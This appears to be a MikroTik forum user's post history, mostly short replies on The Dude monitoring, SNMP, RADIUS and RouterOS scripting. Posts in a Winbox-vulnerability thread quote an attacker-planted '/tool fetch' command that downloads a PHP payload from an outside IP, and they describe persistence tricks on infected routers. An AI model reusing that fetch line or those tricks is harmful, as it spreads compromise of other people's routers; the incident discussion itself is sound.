UPDATE: Looks like it was an issue with the Paravirtualized (virtio-net) adapter. Working properly now with the Intel MT1000 Desktop adapter. ---------- I'm having trouble getting my test setup to work on CHRs in VirtualBox. (Have tried enabling promiscuous mode on adapters as well.) VRRP interface ...
by excession
Wed Feb 12, 2020 8:57 pm
Forum: The Dude
Topic: Creating ping probe with source - IPsec monitoring
Replies: 1
Views: 4202

Re: Creating ping probe with source - IPsec monitoring

You can run a ROS cmd and use it's output in a device label: [ros_command(":put [/ip ipsec active-peers print]")] Or you could add a device from the other side of the link to your map and use that to indicate the status of the tunnel. Or a combination of the two with the ros cmd output dis...
by excession
Wed Feb 12, 2020 8:45 pm
Forum: The Dude
Topic: Non-RouterOS wireless SNMP readings
Replies: 1
Views: 3987

Re: Non-RouterOS wireless SNMP readings

You can display any OID value on a device map tile by modifying it's appearance settings.

Right click and Device on your map -> Appearance -> Label

You can use Insert OID to get an example to put a specific OID into or (having setup SNMP for that device) select the one you want from the list.
by excession
Wed Feb 12, 2020 8:39 pm
Forum: The Dude
Topic: Device types question (MikroTik Device/RouterOS)
Replies: 5
Views: 5175

Re: Device types question (MikroTik Device/RouterOS)

I will eagerly watch this thread for an answer, because I could never find any utility or advantage to specifying either of them. Mainly you can set specific map icons for particular device types. You can also set required services for a device type and use custom services to automatically set the ...
by excession
Wed Feb 12, 2020 8:28 pm
Forum: The Dude
Topic: Get list of devices from Dude server
Replies: 2
Views: 5746

Re: Get list of devices from Dude server

If you only need ROS devices, you can get a lot more info out of the CLI: /dude ros address print It's still not exactly what you want but with some additional processing and logic it might be workable. Or depending how your network is setup you could try de-duplicating the neighbors list: /dude ros...
by excession
Wed Feb 12, 2020 8:13 pm
Forum: The Dude
Topic: Some Mikrotik Icons
Replies: 10
Views: 26986

Re: Some Mikrotik Icons

Thanks!

Also, how? I'm guessing you did some kind of bulk conversion?
by excession
Wed Feb 12, 2020 8:00 pm
Forum: The Dude
Topic: hEX S CPU etc Stats
Replies: 1
Views: 3888

Re: hEX S CPU etc Stats

As far as I know you have to use SNMP for this.
by excession
Wed Feb 12, 2020 7:58 pm
Forum: The User Manager
Topic: USER Manager- Windows NPS
Replies: 1
Views: 9305

Re: USER Manager- Windows NPS

I've not tried this, however: Rather than try to use usermanger, I think what you want to do is set your NPS server as a direct RADIUS server for your Mikrotik then setup Mikrotik Vendor Specific Attributes in NPS to control bandwidth. Mikrotik Attributes: https://wiki.mikrotik.com/wiki/Manual:RADIU...
by excession
Wed Feb 12, 2020 7:44 pm
Forum: Wireless Networking
Topic: DPSK Dynamic WPA2 PSK support [SOLVED]
Replies: 36
Views: 33393

Re: DPSK Dynamic WPA2 PSK support [SOLVED]

This would be way more useful if the Access List didn't stop on the first failure but went on to try and validate against the next matching rule. You could then have multiple PSK's without defined MAC addresses allowing you to set different keys for different users without the need to pre-register M...
by excession
Wed Feb 12, 2020 6:07 pm
Forum: RouterOS beta
Topic: New User Manager in RouterOS v7
Replies: 211
Views: 89751

Re: New User Manager in RouterOS v7

Not seeing Mikrotik specific attributes in the docs: https://help.mikrotik.com/docs/display/ROS7/User+Manager How do we add Vendor Specific attributes? I'd like to be able to add: ATTRIBUTE Mikrotik-Wireless-PSK 16 string Or preferably have all Mikrotik attributes already defined. UPDATE: Looks like...
by excession
Sun Apr 21, 2019 2:14 am
Forum: General
Topic: Make external IP address accessible on secondary port
Replies: 8
Views: 1812

Re: Make external IP address accessible on secondary port

You could bridge two ports together and feed your WAN into one of these. Then set one of your external IPs on this bridge, plug your next router into the other port and set another of your external IPs on that routers interface. You can then enable the IP firewall in Bridge Settings on the first rou...
by excession
Thu Apr 11, 2019 10:53 pm
Forum: The Dude
Topic: Dude 6.41.2 lost SNMP interfaces
Replies: 27
Views: 21283

Re: Dude 6.41.2 lost SNMP interfaces

It’s not like the developers are unaware of these issues, almost certainly there’s a coder at Mikrotik who knows exactly what needs to be done to fix both this and several other stability issues but that it’s just not a priority for them at the moment, however much we would like it to be. It’s so fr...
by excession
Tue Jan 15, 2019 3:55 pm
Forum: The Dude
Topic: The Dude IS Dead, really, isn't it?
Replies: 50
Views: 30442

Re: The Dude IS Dead, really, isn't it?

Please, someone, where is the Dude?
Amen; let 2019 be the year of our Dude..
by excession
Fri Jan 04, 2019 3:08 pm
Forum: Wireless Networking
Topic: Whats is Oid for snr?
Replies: 10
Views: 5864

Re: Whats is Oid for snr?

GringoZ, There isnt an OID for everything you might need to have. However, the answer lies within the interface. As Normis says, you already used a command to show the OIDs. In the same case, the radio certainly knows what the SNR is, as well as many other valuable metrics. The radio is calculating...
by excession
Wed Nov 07, 2018 7:35 pm
Forum: The Dude
Topic: Dude 6.41.2 lost SNMP interfaces
Replies: 27
Views: 21283

Re: Dude 6.41.2 lost SNMP interfaces

Quitting the Dude client then re-opening it and waiting normally works for me.
by excession
Thu Sep 06, 2018 7:34 pm
Forum: The Dude
Topic: Export Map interval
Replies: 34
Views: 24001

Re: Export Map interval

+1 Please add
by excession
Fri Aug 31, 2018 5:07 pm
Forum: The Dude
Topic: Dude 6.41.2 lost SNMP interfaces
Replies: 27
Views: 21283

Re: Dude 6.41.2 lost SNMP interfaces

It wouldn’t be such an issue if I could get it to rediscover ports when this happens.

Sometimes quitting dude client and reconnecting seems to help rediscover lost ports; but not reliably.
by excession
Fri Aug 17, 2018 12:34 pm
Forum: The Dude
Topic: Dude v6/v7 - Feature request list
Replies: 109
Views: 175421

Re: Dude v6 - Feature request list

Link line indicates which end the statistics for that link come from.
Something like a little bump or circle or perhaps an arrow at the end of the link line that shows you which end of the link the statistics are coming from.

Thanks!
by excession
Thu Aug 16, 2018 5:12 pm
Forum: The Dude
Topic: Dude v6 - Backup locally
Replies: 5
Views: 15776

Re: Dude v6 - Backup locally

This saved me a lot of time, thanks for sharing.
by excession
Thu Aug 16, 2018 2:34 pm
Forum: The Dude
Topic: Dude 6.41.2 lost SNMP interfaces
Replies: 27
Views: 21283

Re: Dude 6.41.2 lost SNMP interfaces

+1
This is still happening in 6.42.6. Any fix / workaround to force re-discovery of interfaces?
by excession
Wed Aug 08, 2018 3:19 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 329
Views: 184688

Re: Winbox vulnerability: please upgrade

Is he trying to use Winbox to connect No idea, but possible. how would you route a Winbox connection through a socks proxy? I assume that's a rhetorical question. Haha, actually no, just one based on an almost complete ignorance of socks! I did just find some interesting discussion here: https://fo...
by excession
Wed Aug 08, 2018 2:45 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 329
Views: 184688

Re: Winbox vulnerability: please upgrade

2. I have try to login to remote mikrotik with that password but no success so I think the problem come from the hacker allow only IP 127.0.0.1 to login with "sys" account. And the hacker use script to disable hard reset, so I just ask can I use the serial cable to login. (infected router...
by excession
Wed Aug 08, 2018 2:41 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 329
Views: 184688

Re: Winbox vulnerability: please upgrade

Thats it! THX! In scripts are /tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now. Thanks I grabbed the PHP file before fixing my router. I opened it with notepad a...
by excession
Sun Aug 05, 2018 3:04 pm
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 329
Views: 184688

Re: Winbox vulnerability: please upgrade

Thats it! THX!

In scripts are
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http
Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now.

Thanks
by excession
Fri Aug 03, 2018 5:54 pm
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 329
Views: 184688

Re: Winbox vulnerability: please upgrade

Since the attacker is inserting his script into the targeted routers and changing configuration in them, we recommend to carefully inspect the configuration of your device, restore it from verified backups or export files, and follow generic advice in the above links. What sorts of changes are bein...
by excession
Fri Jul 06, 2018 12:19 pm
Forum: Scripting
Topic: VRRP Priority Script For Device Failover
Replies: 3
Views: 7299

Re: VRRP Priority Script For Device Failover

The above script worked fine for some time until we started to add VRRP interfaces on top of VLAN interfaces, these seem to take a little longer to negotiate state and in turn cause the master to bounce back and fourth between devices. Below are the script updates I've made to resolve the issue: #:l...
by excession
Mon Apr 16, 2018 12:03 pm
Forum: Scripting
Topic: VRRP Priority Script For Device Failover
Replies: 3
Views: 7299

VRRP Priority Script For Device Failover

Hi folks, I had some trouble finding script examples when I wanted to sync my VRRP interfaces. Thought I'd post my examples for what worked for me in the end, to hopefully signpost others. In my scenario: I wanted to ensure that all the VRRP interfaces across my two gateway devices had consistent st...
by excession
Sat May 16, 2015 3:39 pm
Forum: Scripting
Topic: PHP API fileGetContents problem
Replies: 7
Views: 2187

Re: PHP API fileGetContents problem

When I say "Manually" I mean; from Terminal on the device. Where I get a blank response if I run /system health print. The boxes that fail are both mipsbe: routerboard: yes model: 2011iL current-firmware: 3.18 routerboard: yes model: 751U-2HnD current-firmware: 2.37 You're right of course,...
by excession
Sat May 16, 2015 12:40 am
Forum: Scripting
Topic: PHP API fileGetContents problem
Replies: 7
Views: 2187

Re: PHP API fileGetContents problem

Ahh that's brilliant thank you very much. Actually it makes me think of another issue I'm having. I have one (so far as I've found) box that crashes my script if I try to get health data from it. It's v6.20 but I have another v6.20 box that works just fine. I've tried manually running this process o...
by excession
Fri May 15, 2015 4:48 pm
Forum: Scripting
Topic: PHP API fileGetContents problem
Replies: 7
Views: 2187

Re: PHP API fileGetContents problem

Hey, thanks for replying. I'm using php ver 5.4.24 and the export files I'm trying to transfer are all around 2k - 12k. I'm talking to various RouterOS versions but my test system is on ver 6.24. We ended up pushing rather than pulling just to have one less port open on these devices. Unfortunately ...
by excession
Thu May 14, 2015 10:19 pm
Forum: Scripting
Topic: PHP API fileGetContents problem
Replies: 7
Views: 2187

Re: PHP API fileGetContents problem

Couldn't get it to work. In the end I scripted pushing the export file to an FTP server from the target device. //ftp transfer export file $addRequest = new RouterOS\Request('/tool fetch'); $addRequest->setArgument('address', '***.***.***.***'); $addRequest->setArgument('src-path', 'auto_export.rsc'...
by excession
Mon May 11, 2015 8:25 pm
Forum: Scripting
Topic: PHP API fileGetContents problem
Replies: 7
Views: 2187

PHP API fileGetContents problem

Hi Folks, I'm having trouble reading files via the PHP API. My script will happily make a backup file but I'm then unable to get that file back to the webserver: $util = new RouterOS\Util( $client = new RouterOS\Client('******', '******', '******') ); $filename = 'backup.rsc'; $addRequest = new Rout...